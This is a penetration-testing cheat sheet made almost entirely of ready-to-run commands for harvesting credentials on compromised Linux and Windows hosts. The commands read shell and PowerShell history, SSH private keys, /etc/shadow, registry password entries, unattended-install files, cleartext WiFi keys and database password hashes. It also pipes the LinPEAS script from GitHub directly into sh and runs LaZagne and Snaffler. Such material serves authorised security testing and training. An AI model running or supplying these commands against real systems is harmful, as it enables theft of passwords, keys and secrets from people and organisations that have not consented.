Credential Hunting Scripts

Linux Credential Hunting

# History files — highest yield
cat ~/.bash_history ~/.zsh_history ~/.sh_history 2>/dev/null
find / -name ".*_history" 2>/dev/null | xargs cat

# SSH private keys
find / -name "id_rsa" -o -name "id_ed25519" -o -name "*.pem" 2>/dev/null | grep -v proc
cat ~/.ssh/id_rsa

# Config files with passwords (common patterns)
grep -riE "(password|passwd|pwd|secret|token|api_key)\s*[=:]\s*['"]?\w+" \
  /etc /var/www /opt /home 2>/dev/null

# PHP config files (web apps)
find / -name "config.php" -o -name "wp-config.php" -o -name "settings.py" 2>/dev/null | \
  xargs grep -l "password" 2>/dev/null | xargs grep -E "(DB_PASS|password|secret)"

# Environment variables (service accounts often have creds)
env | grep -iE "(pass|pwd|secret|token|key)"
cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep -i pass

# /etc/passwd / shadow
cat /etc/shadow 2>/dev/null
cat /etc/passwd | grep -v nologin | grep -v false

# Service account credentials
cat /etc/mysql/my.cnf /etc/mysql/debian.cnf 2>/dev/null
find /var/lib -name "*.conf" 2>/dev/null | xargs grep -l password

# Recent files accessed by root
find / -readable -newer /etc/passwd 2>/dev/null | head -20

# Cron jobs with credentials
crontab -l; cat /etc/crontab; ls /etc/cron.*/ 2>/dev/null

Windows Credential Hunting

# Stored credentials
cmdkey /list
# Output shows stored Windows Credential Manager entries

# Registry — common password storage locations
reg query HKLM /f "password" /t REG_SZ /s 2>nul
reg query HKCU /f "password" /t REG_SZ /s 2>nul
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2>nul

# Unattended install files
type C:\Windows\sysprep\sysprep.xml 2>nul
type C:\Windows\Panther\Unattend.xml 2>nul
type C:\Windows\system32\sysprep\unattend.xml 2>nul

# PowerShell history
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# IIS web.config files
dir /s /b C:\inetpub\web.config 2>nul | findstr /i "password"

# Application config files
dir /s /b "C:\*config*" 2>nul
findstr /si "password" C:\Users\*.xml C:\Users\*.txt C:\Users\*.ini 2>nul

# SAM / SYSTEM backup (VSS)
vssadmin list shadows 2>nul
# If shadows exist, copy SAM/SYSTEM from shadow copy

# WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="SSID" key=clear

Database Credential Discovery

# MySQL
cat /etc/mysql/my.cnf | grep -E "(user|pass)"
find / -name ".my.cnf" 2>/dev/null | xargs cat
mysql -u root --password="" -e "SELECT User,authentication_string FROM mysql.user;" 2>/dev/null

# PostgreSQL
find / -name "pg_hba.conf" -o -name "postgresql.conf" 2>/dev/null
cat ~/.pgpass 2>/dev/null

# MSSQL (Windows)
# Look in SQL Server config
type "C:\Program Files\Microsoft SQL Server\MSSQL*\MSSQL\Log\ERRORLOG" | findstr pass

Network Config Credentials

# VPN configs
find / -name "*.ovpn" -o -name "*.conf" -path "*/vpn/*" 2>/dev/null
cat /etc/openvpn/*.conf 2>/dev/null | grep -E "(auth|pass)"

# Network manager
cat /etc/NetworkManager/system-connections/* 2>/dev/null | grep -E "(psk|password)"

# SSH config (reveals hosts and potential key paths)
cat ~/.ssh/config 2>/dev/null
cat /etc/ssh/ssh_config 2>/dev/null

Automated Tools

# LinPEAS (Linux)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or upload and run: ./linpeas.sh | tee /tmp/linpeas.txt

# WinPEAS (Windows)
.winPEASx64.exe | Tee-Object -FilePath C:\Windows\Temp\peas.txt

# LaZagne — credential extraction tool (cross-platform)
./lazagne.py all
# Searches: browsers, databases, git, mail, maven, sysadmin tools

# Windows: LaZagne.exe
.LaZagne.exe all > C:\Windows\Temp\lazagne_out.txt

# Snaffler — network share credential hunting
.Snaffler.exe -s -o snaffler.log
# Searches SYSVOL, shares for config files, credentials